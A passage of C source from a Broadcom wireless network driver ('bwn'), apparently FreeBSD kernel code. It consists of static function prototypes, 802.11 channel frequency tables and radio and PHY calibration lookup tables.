bwn_ofdmtab_write_4(struct bwn_mac *, uint16_t, uint16_t, uint32_t); static void bwn_gtab_write(struct bwn_mac *, uint16_t, uint16_t, uint16_t); static void bwn_ram_write(struct bwn_mac *, uint16_t, uint32_t); static void bwn_mac_suspend(struct bwn_mac *); static void bwn_mac_enable(struct bwn_mac *); static void bwn_psctl(struct bwn_mac *, uint32_t); static int16_t bwn_nrssi_read(struct bwn_mac *, uint16_t); static void bwn_nrssi_offset(struct bwn_mac *); static void bwn_nrssi_threshold(struct bwn_mac *); static void bwn_nrssi_slope_11g(struct bwn_mac *); static void bwn_set_all_gains(struct bwn_mac *, int16_t, int16_t, int16_t); static void bwn_set_original_gains(struct bwn_mac *); static void bwn_hwpctl_early_init(struct bwn_mac *); static void bwn_hwpctl_init_gphy(struct bwn_mac *); static uint16_t bwn_phy_g_chan2freq(uint8_t); static int bwn_fw_gets(struct bwn_mac *, enum bwn_fwtype); static int bwn_fw_get(struct bwn_mac *, enum bwn_fwtype, const char *, struct bwn_fwfile *); static void bwn_release_firmware(struct bwn_mac *); static void bwn_do_release_fw(struct bwn_fwfile *); static uint16_t bwn_fwcaps_read(struct bwn_mac *); static int bwn_fwinitvals_write(struct bwn_mac *, const struct bwn_fwinitvals *, size_t, size_t); static int bwn_switch_channel(struct bwn_mac *, int); static uint16_t bwn_ant2phy(int); static void bwn_mac_write_bssid(struct bwn_mac *); static void bwn_mac_setfilter(struct bwn_mac *, uint16_t, const uint8_t *); static void bwn_key_dowrite(struct bwn_mac *, uint8_t, uint8_t, const uint8_t *, size_t, const uint8_t *); static void bwn_key_macwrite(struct bwn_mac *, uint8_t, const uint8_t *); static void bwn_key_write(struct bwn_mac *, uint8_t, uint8_t, const uint8_t *); static void bwn_phy_exit(struct bwn_mac *); static void bwn_core_stop(struct bwn_mac *); static int bwn_switch_band(struct bwn_softc *, struct ieee80211_channel *); static void bwn_phy_reset(struct bwn_mac *); static int bwn_newstate(struct ieee80211vap *, enum ieee80211_state, int); static void bwn_set_pretbtt(struct bwn_mac *); static int bwn_intr(void *); static void bwn_intrtask(void *, int); static void bwn_restart(struct bwn_mac *, const char *); static void bwn_intr_ucode_debug(struct bwn_mac *); static void bwn_intr_tbtt_indication(struct bwn_mac *); static void bwn_intr_atim_end(struct bwn_mac *); static void bwn_intr_beacon(struct bwn_mac *); static void bwn_intr_pmq(struct bwn_mac *); static void bwn_intr_noise(struct bwn_mac *); static void bwn_intr_txeof(struct bwn_mac *); static void bwn_hwreset(void *, int); static void bwn_handle_fwpanic(struct bwn_mac *); static void bwn_load_beacon0(struct bwn_mac *); static void bwn_load_beacon1(struct bwn_mac *); static uint32_t bwn_jssi_read(struct bwn_mac *); static void bwn_noise_gensample(struct bwn_mac *); static void bwn_handle_txeof(struct bwn_mac *, const struct bwn_txstatus *); static void bwn_rxeof(struct bwn_mac *, struct mbuf *, const void *); static void bwn_phy_txpower_check(struct bwn_mac *, uint32_t); static void bwn_start_locked(struct ifnet *); static int bwn_tx_start(struct bwn_softc *, struct ieee80211_node *, struct mbuf *); static int bwn_tx_isfull(struct bwn_softc *, struct mbuf *); static int bwn_set_txhdr(struct bwn_mac *, struct ieee80211_node *, struct mbuf *, struct bwn_txhdr *, uint16_t); static void bwn_plcp_genhdr(struct bwn_plcp4 *, const uint16_t, const uint8_t); static uint8_t bwn_antenna_sanitize(struct bwn_mac *, uint8_t); static uint8_t bwn_get_fbrate(uint8_t); static int bwn_phy_shm_tssi_read(struct bwn_mac *, uint16_t); static void bwn_phy_g_setatt(struct bwn_mac *, int *, int *); static void bwn_phy_lock(struct bwn_mac *); static void bwn_phy_unlock(struct bwn_mac *); static void bwn_rf_lock(struct bwn_mac *); static void bwn_rf_unlock(struct bwn_mac *); static void bwn_txpwr(void *, int); static void bwn_tasks(void *); static void bwn_task_15s(struct bwn_mac *); static void bwn_task_30s(struct bwn_mac *); static void bwn_task_60s(struct bwn_mac *); static int bwn_plcp_get_ofdmrate(struct bwn_mac *, struct bwn_plcp6 *, uint8_t); static int bwn_plcp_get_cckrate(struct bwn_mac *, struct bwn_plcp6 *); static void bwn_rx_radiotap(struct bwn_mac *, struct mbuf *, const struct bwn_rxhdr4 *, struct bwn_plcp6 *, int, int, int); static void bwn_tsf_read(struct bwn_mac *, uint64_t *); static void bwn_phy_g_dc_lookup_init(struct bwn_mac *, uint8_t); static void bwn_set_slot_time(struct bwn_mac *, uint16_t); static void bwn_watchdog(void *); static void bwn_dma_stop(struct bwn_mac *); static void bwn_pio_stop(struct bwn_mac *); static void bwn_dma_ringstop(struct bwn_dma_ring **); static void bwn_led_attach(struct bwn_mac *); static void bwn_led_newstate(struct bwn_mac *, enum ieee80211_state); static void bwn_led_event(struct bwn_mac *, int); static void bwn_led_blink_start(struct bwn_mac *, int, int); static void bwn_led_blink_next(void *); static void bwn_led_blink_end(void *); static void bwn_rfswitch(void *); static void bwn_rf_turnon(struct bwn_mac *); static void bwn_rf_turnoff(struct bwn_mac *); static void bwn_phy_lp_init_pre(struct bwn_mac *); static int bwn_phy_lp_init(struct bwn_mac *); static uint16_t bwn_phy_lp_read(struct bwn_mac *, uint16_t); static void bwn_phy_lp_write(struct bwn_mac *, uint16_t, uint16_t); static void bwn_phy_lp_maskset(struct bwn_mac *, uint16_t, uint16_t, uint16_t); static uint16_t bwn_phy_lp_rf_read(struct bwn_mac *, uint16_t); static void bwn_phy_lp_rf_write(struct bwn_mac *, uint16_t, uint16_t); static void bwn_phy_lp_rf_onoff(struct bwn_mac *, int); static int bwn_phy_lp_switch_channel(struct bwn_mac *, uint32_t); static uint32_t bwn_phy_lp_get_default_chan(struct bwn_mac *); static void bwn_phy_lp_set_antenna(struct bwn_mac *, int); static void bwn_phy_lp_task_60s(struct bwn_mac *); static void bwn_phy_lp_readsprom(struct bwn_mac *); static void bwn_phy_lp_bbinit(struct bwn_mac *); static void bwn_phy_lp_txpctl_init(struct bwn_mac *); static void bwn_phy_lp_calib(struct bwn_mac *); static void bwn_phy_lp_switch_analog(struct bwn_mac *, int); static int bwn_phy_lp_b2062_switch_channel(struct bwn_mac *, uint8_t); static int bwn_phy_lp_b2063_switch_channel(struct bwn_mac *, uint8_t); static void bwn_phy_lp_set_anafilter(struct bwn_mac *, uint8_t); static void bwn_phy_lp_set_gaintbl(struct bwn_mac *, uint32_t); static void bwn_phy_lp_digflt_save(struct bwn_mac *); static void bwn_phy_lp_get_txpctlmode(struct bwn_mac *); static void bwn_phy_lp_set_txpctlmode(struct bwn_mac *, uint8_t); static void bwn_phy_lp_bugfix(struct bwn_mac *); static void bwn_phy_lp_digflt_restore(struct bwn_mac *); static void bwn_phy_lp_tblinit(struct bwn_mac *); static void bwn_phy_lp_bbinit_r2(struct bwn_mac *); static void bwn_phy_lp_bbinit_r01(struct bwn_mac *); static void bwn_phy_lp_b2062_init(struct bwn_mac *); static void bwn_phy_lp_b2063_init(struct bwn_mac *); static void bwn_phy_lp_rxcal_r2(struct bwn_mac *); static void bwn_phy_lp_rccal_r12(struct bwn_mac *); static void bwn_phy_lp_set_rccap(struct bwn_mac *); static uint32_t bwn_phy_lp_roundup(uint32_t, uint32_t, uint8_t); static void bwn_phy_lp_b2062_reset_pllbias(struct bwn_mac *); static void bwn_phy_lp_b2062_vco_calib(struct bwn_mac *); static void bwn_tab_write_multi(struct bwn_mac *, uint32_t, int, const void *); static void bwn_tab_read_multi(struct bwn_mac *, uint32_t, int, void *); static struct bwn_txgain bwn_phy_lp_get_txgain(struct bwn_mac *); static uint8_t bwn_phy_lp_get_bbmult(struct bwn_mac *); static void bwn_phy_lp_set_txgain(struct bwn_mac *, struct bwn_txgain *); static void bwn_phy_lp_set_bbmult(struct bwn_mac *, uint8_t); static void bwn_phy_lp_set_trsw_over(struct bwn_mac *, uint8_t, uint8_t); static void bwn_phy_lp_set_rxgain(struct bwn_mac *, uint32_t); static void bwn_phy_lp_set_deaf(struct bwn_mac *, uint8_t); static int bwn_phy_lp_calc_rx_iq_comp(struct bwn_mac *, uint16_t); static void bwn_phy_lp_clear_deaf(struct bwn_mac *, uint8_t); static void bwn_phy_lp_tblinit_r01(struct bwn_mac *); static void bwn_phy_lp_tblinit_r2(struct bwn_mac *); static void bwn_phy_lp_tblinit_txgain(struct bwn_mac *); static void bwn_tab_write(struct bwn_mac *, uint32_t, uint32_t); static void bwn_phy_lp_b2062_tblinit(struct bwn_mac *); static void bwn_phy_lp_b2063_tblinit(struct bwn_mac *); static int bwn_phy_lp_loopback(struct bwn_mac *); static void bwn_phy_lp_set_rxgain_idx(struct bwn_mac *, uint16_t); static void bwn_phy_lp_ddfs_turnon(struct bwn_mac *, int, int, int, int, int); static uint8_t bwn_phy_lp_rx_iq_est(struct bwn_mac *, uint16_t, uint8_t, struct bwn_phy_lp_iq_est *); static void bwn_phy_lp_ddfs_turnoff(struct bwn_mac *); static uint32_t bwn_tab_read(struct bwn_mac *, uint32_t); static void bwn_phy_lp_set_txgain_dac(struct bwn_mac *, uint16_t); static void bwn_phy_lp_set_txgain_pa(struct bwn_mac *, uint16_t); static void bwn_phy_lp_set_txgain_override(struct bwn_mac *); static uint16_t bwn_phy_lp_get_pa_gain(struct bwn_mac *); static uint8_t bwn_nbits(int32_t); static void bwn_phy_lp_gaintbl_write_multi(struct bwn_mac *, int, int, struct bwn_txgain_entry *); static void bwn_phy_lp_gaintbl_write(struct bwn_mac *, int, struct bwn_txgain_entry); static void bwn_phy_lp_gaintbl_write_r2(struct bwn_mac *, int, struct bwn_txgain_entry); static void bwn_phy_lp_gaintbl_write_r01(struct bwn_mac *, int, struct bwn_txgain_entry); static void bwn_sysctl_node(struct bwn_softc *); static struct resource_spec bwn_res_spec_legacy[] = { { SYS_RES_IRQ, 0, RF_ACTIVE | RF_SHAREABLE }, { -1, 0, 0 } }; static struct resource_spec bwn_res_spec_msi[] = { { SYS_RES_IRQ, 1, RF_ACTIVE }, { -1, 0, 0 } }; static const struct bwn_channelinfo bwn_chantable_bg = { .channels = { { 2412, 1, 30 }, { 2417, 2, 30 }, { 2422, 3, 30 }, { 2427, 4, 30 }, { 2432, 5, 30 }, { 2437, 6, 30 }, { 2442, 7, 30 }, { 2447, 8, 30 }, { 2452, 9, 30 }, { 2457, 10, 30 }, { 2462, 11, 30 }, { 2467, 12, 30 }, { 2472, 13, 30 }, { 2484, 14, 30 } }, .nchannels = 14 }; static const struct bwn_channelinfo bwn_chantable_a = { .channels = { { 5170, 34, 30 }, { 5180, 36, 30 }, { 5190, 38, 30 }, { 5200, 40, 30 }, { 5210, 42, 30 }, { 5220, 44, 30 }, { 5230, 46, 30 }, { 5240, 48, 30 }, { 5260, 52, 30 }, { 5280, 56, 30 }, { 5300, 60, 30 }, { 5320, 64, 30 }, { 5500, 100, 30 }, { 5520, 104, 30 }, { 5540, 108, 30 }, { 5560, 112, 30 }, { 5580, 116, 30 }, { 5600, 120, 30 }, { 5620, 124, 30 }, { 5640, 128, 30 }, { 5660, 132, 30 }, { 5680, 136, 30 }, { 5700, 140, 30 }, { 5745, 149, 30 }, { 5765, 153, 30 }, { 5785, 157, 30 }, { 5805, 161, 30 }, { 5825, 165, 30 }, { 5920, 184, 30 }, { 5940, 188, 30 }, { 5960, 192, 30 }, { 5980, 196, 30 }, { 6000, 200, 30 }, { 6020, 204, 30 }, { 6040, 208, 30 }, { 6060, 212, 30 }, { 6080, 216, 30 } }, .nchannels = 37 }; static const struct bwn_channelinfo bwn_chantable_n = { .channels = { { 5160, 32, 30 }, { 5170, 34, 30 }, { 5180, 36, 30 }, { 5190, 38, 30 }, { 5200, 40, 30 }, { 5210, 42, 30 }, { 5220, 44, 30 }, { 5230, 46, 30 }, { 5240, 48, 30 }, { 5250, 50, 30 }, { 5260, 52, 30 }, { 5270, 54, 30 }, { 5280, 56, 30 }, { 5290, 58, 30 }, { 5300, 60, 30 }, { 5310, 62, 30 }, { 5320, 64, 30 }, { 5330, 66, 30 }, { 5340, 68, 30 }, { 5350, 70, 30 }, { 5360, 72, 30 }, { 5370, 74, 30 }, { 5380, 76, 30 }, { 5390, 78, 30 }, { 5400, 80, 30 }, { 5410, 82, 30 }, { 5420, 84, 30 }, { 5430, 86, 30 }, { 5440, 88, 30 }, { 5450, 90, 30 }, { 5460, 92, 30 }, { 5470, 94, 30 }, { 5480, 96, 30 }, { 5490, 98, 30 }, { 5500, 100, 30 }, { 5510, 102, 30 }, { 5520, 104, 30 }, { 5530, 106, 30 }, { 5540, 108, 30 }, { 5550, 110, 30 }, { 5560, 112, 30 }, { 5570, 114, 30 }, { 5580, 116, 30 }, { 5590, 118, 30 }, { 5600, 120, 30 }, { 5610, 122, 30 }, { 5620, 124, 30 }, { 5630, 126, 30 }, { 5640, 128, 30 }, { 5650, 130, 30 }, { 5660, 132, 30 }, { 5670, 134, 30 }, { 5680, 136, 30 }, { 5690, 138, 30 }, { 5700, 140, 30 }, { 5710, 142, 30 }, { 5720, 144, 30 }, { 5725, 145, 30 }, { 5730, 146, 30 }, { 5735, 147, 30 }, { 5740, 148, 30 }, { 5745, 149, 30 }, { 5750, 150, 30 }, { 5755, 151, 30 }, { 5760, 152, 30 }, { 5765, 153, 30 }, { 5770, 154, 30 }, { 5775, 155, 30 }, { 5780, 156, 30 }, { 5785, 157, 30 }, { 5790, 158, 30 }, { 5795, 159, 30 }, { 5800, 160, 30 }, { 5805, 161, 30 }, { 5810, 162, 30 }, { 5815, 163, 30 }, { 5820, 164, 30 }, { 5825, 165, 30 }, { 5830, 166, 30 }, { 5840, 168, 30 }, { 5850, 170, 30 }, { 5860, 172, 30 }, { 5870, 174, 30 }, { 5880, 176, 30 }, { 5890, 178, 30 }, { 5900, 180, 30 }, { 5910, 182, 30 }, { 5920, 184, 30 }, { 5930, 186, 30 }, { 5940, 188, 30 }, { 5950, 190, 30 }, { 5960, 192, 30 }, { 5970, 194, 30 }, { 5980, 196, 30 }, { 5990, 198, 30 }, { 6000, 200, 30 }, { 6010, 202, 30 }, { 6020, 204, 30 }, { 6030, 206, 30 }, { 6040, 208, 30 }, { 6050, 210, 30 }, { 6060, 212, 30 }, { 6070, 214, 30 }, { 6080, 216, 30 }, { 6090, 218, 30 }, { 6100, 220, 30 }, { 6110, 222, 30 }, { 6120, 224, 30 }, { 6130, 226, 30 }, { 6140, 228, 30 } }, .nchannels = 110 }; static const uint8_t bwn_b2063_chantable_data[33][12] = { { 0x6f, 0x3c, 0x3c, 0x4, 0x5, 0x5, 0x5, 0x5, 0x77, 0x80, 0x80, 0x70 }, { 0x6f, 0x2c, 0x2c, 0x4, 0x5, 0x5, 0x5, 0x5, 0x77, 0x80, 0x80, 0x70 }, { 0x6f, 0x1c, 0x1c, 0x4, 0x5, 0x5, 0x5, 0x5, 0x77, 0x80, 0x80, 0x70 }, { 0x6e, 0x1c, 0x1c, 0x4, 0x5, 0x5, 0x5, 0x5, 0x77, 0x80, 0x80, 0x70 }, { 0x6e, 0xc, 0xc, 0x4, 0x5, 0x5, 0x5, 0x5, 0x77, 0x80, 0x80, 0x70 }, { 0x6a, 0xc, 0xc, 0, 0x2, 0x5, 0xd, 0xd, 0x77, 0x80, 0x20, 0 }, { 0x6a, 0xc, 0xc, 0, 0x1, 0x5, 0xd, 0xc, 0x77, 0x80, 0x20, 0 }, { 0x6a, 0xc, 0xc, 0, 0x1, 0x4, 0xc, 0xc, 0x77, 0x80, 0x20, 0 }, { 0x69, 0xc, 0xc, 0, 0x1, 0x4, 0xc, 0xc, 0x77, 0x70, 0x20, 0 }, { 0x69, 0xc, 0xc, 0, 0x1, 0x4, 0xb, 0xc, 0x77, 0x70, 0x20, 0 }, { 0x69, 0xc, 0xc, 0, 0, 0x4, 0xb, 0xb, 0x77, 0x60, 0x20, 0 }, { 0x69, 0xc, 0xc, 0, 0, 0x3, 0xa, 0xb, 0x77, 0x60, 0x20, 0 }, { 0x69, 0xc, 0xc, 0, 0, 0x3, 0xa, 0xa, 0x77, 0x60, 0x20, 0 }, { 0x68, 0xc, 0xc, 0, 0, 0x2, 0x9, 0x9, 0x77, 0x60, 0x20, 0 }, { 0x68, 0xc, 0xc, 0, 0, 0x1, 0x8, 0x8, 0x77, 0x50, 0x10, 0 }, { 0x67, 0xc, 0xc, 0, 0, 0, 0x8, 0x8, 0x77, 0x50, 0x10, 0 }, { 0x64, 0xc, 0xc, 0, 0, 0, 0x2, 0x1, 0x77, 0x20, 0, 0 }, { 0x64, 0xc, 0xc, 0, 0, 0, 0x1, 0x1, 0x77, 0x20, 0, 0 }, { 0x63, 0xc, 0xc, 0, 0, 0, 0x1, 0, 0x77, 0x10, 0, 0 }, { 0x63, 0xc, 0xc, 0, 0, 0, 0, 0, 0x77, 0x10, 0, 0 }, { 0x62, 0xc, 0xc, 0, 0, 0, 0, 0, 0x77, 0x10, 0, 0 }, { 0x62, 0xc, 0xc, 0, 0, 0, 0, 0, 0x77, 0, 0, 0 }, { 0x61, 0xc, 0xc, 0, 0, 0, 0, 0, 0x77, 0, 0, 0 }, { 0x60, 0xc, 0xc, 0, 0, 0, 0, 0, 0x77, 0, 0, 0 }, { 0x6e, 0xc, 0xc, 0, 0x9, 0xe, 0xf, 0xf, 0x77, 0xc0, 0x50, 0 }, { 0x6e, 0xc, 0xc, 0, 0x9, 0xd, 0xf, 0xf, 0x77, 0xb0, 0x50, 0 }, { 0x6e, 0xc, 0xc, 0, 0x8, 0xc, 0xf, 0xf, 0x77, 0xb0, 0x50, 0 }, { 0x6d, 0xc, 0xc, 0, 0x8, 0xc, 0xf, 0xf, 0x77, 0xa0, 0x40, 0 }, { 0x6d, 0xc, 0xc, 0, 0x8, 0xb, 0xf, 0xf, 0x77, 0xa0, 0x40, 0 }, { 0x6d, 0xc, 0xc, 0, 0x8, 0xa, 0xf, 0xf, 0x77, 0xa0, 0x40, 0 }, { 0x6c, 0xc, 0xc, 0, 0x7, 0x9, 0xf, 0xf, 0x77, 0x90, 0x40, 0 }, { 0x6c, 0xc, 0xc, 0, 0x6, 0x8, 0xf, 0xf, 0x77, 0x90, 0x40, 0 }, { 0x6c, 0xc, 0xc, 0, 0x5, 0x8, 0xf, 0xf, 0x77, 0x90, 0x40, 0 } }; static const struct bwn_b206x_chan bwn_b2063_chantable[] = { { 1, 2412, bwn_b2063_chantable_data[0] }, { 2, 2417, bwn_b2063_chantable_data[0] }, { 3, 2422, bwn_b2063_chantable_data[0] }, { 4, 2427, bwn_b2063_chantable_data[1] }, { 5, 2432, bwn_b2063_chantable_data[1] }, { 6, 2437, bwn_b2063_chantable_data[1] }, { 7, 2442, bwn_b2063_chantable_data[1] }, { 8, 2447, bwn_b2063_chantable_data[1] }, { 9, 2452, bwn_b2063_chantable_data[2] }, { 10, 2457, bwn_b2063_chantable_data[2] }, { 11, 2462, bwn_b2063_chantable_data[3] }, { 12, 2467, bwn_b2063_chantable_data[3] }, { 13, 2472, bwn_b2063_chantable_data[3] }, { 14, 2484, bwn_b2063_chantable_data[4] }, { 34, 5170, bwn_b2063_chantable_data[5] }, { 36, 5180, bwn_b2063_chantable_data[6] }, { 38, 5190, bwn_b2063_chantable_data[7] }, { 40, 5200, bwn_b2063_chantable_data[8] }, { 42, 5210, bwn_b2063_chantable_data[9] }, { 44, 5220, bwn_b2063_chantable_data[10] }, { 46, 5230, bwn_b2063_chantable_data[11] }, { 48, 5240, bwn_b2063_chantable_data[12] }, { 52, 5260, bwn_b2063_chantable_data[13] }, { 56, 5280, bwn_b2063_chantable_data[14] }, { 60, 5300, bwn_b2063_chantable_data[14] }, { 64, 5320, bwn_b2063_chantable_data[15] }, { 100, 5500, bwn_b2063_chantable_data[16] }, { 104, 5520, bwn_b2063_chantable_data[17] }, { 108, 5540, bwn_b2063_chantable_data[18] }, { 112, 5560, bwn_b2063_chantable_data[19] }, { 116, 5580, bwn_b2063_chantable_data[20] }, { 120, 5600, bwn_b2063_chantable_data[21] }, { 124, 5620, bwn_b2063_chantable_data[21] }, { 128, 5640, bwn_b2063_chantable_data[22] }, { 132, 5660, bwn_b2063_chantable_data[22] }, { 136, 5680, bwn_b2063_chantable_data[22] }, { 140, 5700, bwn_b2063_chantable_data[23] }, { 149, 5745, bwn_b2063_chantable_data[23] }, { 153, 5765, bwn_b2063_chantable_data[23] }, { 157, 5785, bwn_b2063_chantable_data[23] }, { 161, 5805, bwn_b2063_chantable_data[23] }, { 165, 5825, bwn_b2063_chantable_data[23] }, { 184, 4920, bwn_b2063_chantable_data[24] }, { 188, 4940, bwn_b2063_chantable_data[25] }, { 192, 4960, bwn_b2063_chantable_data[26] }, { 196, 4980, bwn_b2063_chantable_data[27] }, { 200, 5000, bwn_b2063_chantable_data[28] }, { 204, 5020, bwn_b2063_chantable_data[29] }, { 208, 5040, bwn_b2063_chantable_data[30] }, { 212, 5060, bwn_b2063_chantable_data[31] }, { 216, 5080, bwn_b2063_chantable_data[32] } }; static const uint8_t bwn_b2062_chantable_data[22][12] = { { 0xff, 0xff, 0xb5, 0x1b, 0x24, 0x32, 0x32, 0x88, 0x88, 0, 0, 0 }, { 0, 0x22, 0x20, 0x84, 0x3c, 0x77, 0x35, 0xff, 0x88, 0, 0, 0 }, { 0, 0x11, 0x10, 0x83, 0x3c, 0x77, 0x35, 0xff, 0x88, 0, 0, 0 }, { 0, 0, 0, 0x83, 0x3c, 0x77, 0x35, 0xff, 0x88, 0, 0, 0 }, { 0, 0x11, 0x20, 0x83, 0x3c, 0x77, 0x35, 0xff, 0x88, 0, 0, 0 }, { 0, 0x11, 0x10, 0x84, 0x3c, 0x77, 0x35, 0xff, 0x88, 0, 0, 0 }, { 0, 0x11, 0, 0x83, 0x3c, 0x77, 0x35, 0xff, 0x88, 0, 0, 0 }, { 0, 0, 0, 0x63, 0x3c, 0x77, 0x35, 0xff, 0x88, 0, 0, 0 }, { 0, 0, 0, 0x62, 0x3c, 0x77, 0x35, 0xff, 0x88, 0, 0, 0 }, { 0, 0, 0, 0x30, 0x3c, 0x77, 0x37, 0xff, 0x88, 0, 0, 0 }, { 0, 0, 0, 0x20, 0x3c, 0x77, 0x37, 0xff, 0x88, 0, 0, 0 }, { 0, 0, 0, 0x10, 0x3c, 0x77, 0x37, 0xff, 0x88, 0, 0, 0 }, { 0, 0, 0, 0, 0x3c, 0x77, 0x37, 0xff, 0x88, 0, 0, 0 }, { 0x55, 0x77, 0x90, 0xf7, 0x3c, 0x77, 0x35, 0xff, 0xff, 0, 0, 0 }, { 0x44, 0x77, 0x80, 0xe7, 0x3c, 0x77, 0x35, 0xff, 0xff, 0, 0, 0 }, { 0x44, 0x66, 0x80, 0xe7, 0x3c, 0x77, 0x35, 0xff, 0xff, 0, 0, 0 }, { 0x33, 0x66, 0x70, 0xc7, 0x3c, 0x77, 0x35, 0xff, 0xff, 0, 0, 0 }, { 0x22, 0x55, 0x60, 0xd7, 0x3c, 0x77, 0x35, 0xff, 0xff, 0, 0, 0 }, { 0x22, 0x55, 0x60, 0xc7, 0x3c, 0x77, 0x35, 0xff, 0xff, 0, 0, 0 }, { 0x22, 0x44, 0x50, 0xc7, 0x3c, 0x77, 0x35, 0xff, 0xff, 0, 0, 0 }, { 0x11, 0x44, 0x50, 0xa5, 0x3c, 0x77, 0x35, 0xff, 0x88, 0, 0, 0 }, { 0, 0x44, 0x40, 0xb6, 0x3c, 0x77, 0x35, 0xff, 0x88, 0, 0, 0 } }; static const struct bwn_b206x_chan bwn_b2062_chantable[] = { { 1, 2412, bwn_b2062_chantable_data[0] }, { 2, 2417, bwn_b2062_chantable_data[0] }, { 3, 2422, bwn_b2062_chantable_data[0] }, { 4, 2427, bwn_b2062_chantable_data[0] }, { 5, 2432, bwn_b2062_chantable_data[0] }, { 6, 2437, bwn_b2062_chantable_data[0] }, { 7, 2442, bwn_b2062_chantable_data[0] }, { 8, 2447, bwn_b2062_chantable_data[0] }, { 9, 2452, bwn_b2062_chantable_data[0] }, { 10, 2457, bwn_b2062_chantable_data[0] }, { 11, 2462, bwn_b2062_chantable_data[0] }, { 12, 2467, bwn_b2062_chantable_data[0] }, { 13, 2472, bwn_b2062_chantable_data[0] }, { 14, 2484, bwn_b2062_chantable_data[0] }, { 34, 5170, bwn_b2062_chantable_data[1] }, { 38, 5190, bwn_b2062_chantable_data[2] }, { 42, 5210, bwn_b2062_chantable_data[2] }, { 46, 5230, bwn_b2062_chantable_data[3] }, { 36, 5180, bwn_b2062_chantable_data[4] }, { 40, 5200, bwn_b2062_chantable_data[5] }, { 44, 5220, bwn_b2062_chantable_data[6] }, { 48, 5240, bwn_b2062_chantable_data[3] }, { 52, 5260, bwn_b2062_chantable_data[3] }, { 56, 5280, bwn_b2062_chantable_data[3] }, { 60, 5300, bwn_b2062_chantable_data[7] }, { 64, 5320, bwn_b2062_chantable_data[8] }, { 100, 5500, bwn_b2062_chantable_data[9] }, { 104, 5520, bwn_b2062_chantable_data[10] }, { 108, 5540, bwn_b2062_chantable_data[10] }, { 112, 5560, bwn_b2062_chantable_data[10] }, { 116, 5580, bwn_b2062_chantable_data[11] }, { 120, 5600, bwn_b2062_chantable_data[12] }, { 124, 5620, bwn_b2062_chantable_data[12] }, { 128, 5640, bwn_b2062_chantable_data[12] }, { 132, 5660, bwn_b2062_chantable_data[12] }, { 136, 5680, bwn_b2062_chantable_data[12] }, { 140, 5700, bwn_b2062_chantable_data[12] }, { 149, 5745, bwn_b2062_chantable_data[12] }, { 153, 5765, bwn_b2062_chantable_data[12] }, { 157, 5785, bwn_b2062_chantable_data[12] }, { 161, 5805, bwn_b2062_chantable_data[12] }, { 165, 5825, bwn_b2062_chantable_data[12] }, { 184, 4920, bwn_b2062_chantable_data[13] }, { 188, 4940, bwn_b2062_chantable_data[14] }, { 192, 4960, bwn_b2062_chantable_data[15] }, { 196, 4980, bwn_b2062_chantable_data[16] }, { 200, 5000, bwn_b2062_chantable_data[17] }, { 204, 5020, bwn_b2062_chantable_data[18] }, { 208, 5040, bwn_b2062_chantable_data[19] }, { 212, 5060, bwn_b2062_chantable_data[20] }, { 216, 5080, bwn_b2062_chantable_data[21] } }; /* for LP PHY */ static const struct bwn_rxcompco bwn_rxcompco_5354[] = { { 1, -66, 15 }, { 2, -66, 15 }, { 3, -66, 15 }, { 4, -66, 15 }, { 5, -66, 15 }, { 6, -66, 15 }, { 7, -66, 14 }, { 8, -66, 14 }, { 9, -66, 14 }, { 10, -66, 14 }, { 11, -66, 14 }, { 12, -66, 13 }, { 13, -66, 13 }, { 14, -66, 13 }, }; /* for LP PHY */ static const struct bwn_rxcompco bwn_rxcompco_r12[] = { { 1, -64, 13 }, { 2, -64, 13 }, { 3, -64, 13 }, { 4, -64, 13 }, { 5, -64, 12 }, { 6, -64, 12 }, { 7, -64, 12 }, { 8, -64, 12 }, { 9, -64, 12 }, { 10, -64, 11 }, { 11, -64, 11 }, { 12, -64, 11 }, { 13, -64, 11 }, { 14, -64, 10 }, { 34, -62, 24 }, { 38, -62, 24 }, { 42, -62, 24 }, { 46, -62, 23 }, { 36, -62, 24 }, { 40, -62, 24 }, { 44, -62, 23 }, { 48, -62, 23 }, { 52, -62, 23 }, { 56, -62, 22 }, { 60, -62, 22 }, { 64, -62, 22 }, { 100, -62, 16 }, { 104, -62, 16 }, { 108, -62, 15 }, { 112, -62, 14 }, { 116, -62, 14 }, { 120, -62, 13 }, { 124, -62, 12 }, { 128, -62, 12 }, { 132, -62, 12 }, { 136, -62, 11 }, { 140, -62, 10 }, { 149, -61, 9 }, { 153, -61, 9 }, { 157, -61, 9 }, { 161, -61, 8 }, { 165, -61, 8 }, { 184, -62, 25 }, { 188, -62, 25 }, { 192, -62, 25 }, { 196, -62, 25 }, { 200, -62, 25 }, { 204, -62, 25 }, { 208, -62, 25 }, { 212, -62, 25 }, { 216, -62, 26 }, }; static const struct bwn_rxcompco bwn_rxcompco_r2 = { 0, -64, 0 }; static const uint8_t bwn_tab_sigsq_tbl[] = { 0xde, 0xdc, 0xda, 0xd8, 0xd6, 0xd4, 0xd2, 0xcf, 0xcd, 0xca, 0xc7, 0xc4, 0xc1, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0x00, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xc1, 0xc4, 0xc7, 0xca, 0xcd, 0xcf, 0xd2, 0xd4, 0xd6, 0xd8, 0xda, 0xdc, 0xde, }; static const uint8_t bwn_tab_pllfrac_tbl[] = { 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x00, 0x00, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, }; static const uint16_t bwn_tabl_iqlocal_tbl[] = { 0x0200, 0x0300, 0x0400, 0x0600, 0x0800, 0x0b00, 0x1000, 0x1001, 0x1002, 0x1003, 0x1004, 0x1005, 0x1006, 0x1007, 0x1707, 0x2007, 0x2d07, 0x4007, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0200, 0x0300, 0x0400, 0x0600, 0x0800, 0x0b00, 0x1000, 0x1001, 0x1002, 0x1003, 0x1004, 0x1005, 0x1006, 0x1007, 0x1707, 0x2007, 0x2d07, 0x4007, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 